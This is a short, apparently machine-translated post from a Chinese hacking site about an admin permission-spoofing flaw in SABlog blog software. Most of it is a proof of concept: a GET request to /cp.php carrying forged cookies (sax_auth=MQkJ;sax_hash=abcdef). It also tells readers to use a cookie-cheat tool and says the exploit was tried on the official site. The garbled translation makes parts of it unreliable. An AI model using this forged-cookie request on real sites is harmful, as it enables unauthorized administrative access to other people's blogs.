SAblog background permission spoofing vulnerability simple use method-vulnerability warning-the black bar safety net

ID MYHACK58:62201026230
Type myhack58
Reporter 佚名
Modified 2010-02-25T00:00:00


Vulnerability analysis article:<>

We may not use this POC, then we get SABlog official test! As far as I know SAblog the author is Security angels of the Creator!

First of all open our Guilin veteran developed cookie cheat tool!

Given POC

GET /cp.php HTTP/1.1; Host: Connection: Close Cookie: sax_auth=MQkJ;sax_hash=abcdef;

There is a section of the cookie, then we point that the lock bit of the input sax_auth=MQkJ;sax_hash=abcdef;

The use is so simple, but get the shell more difficult..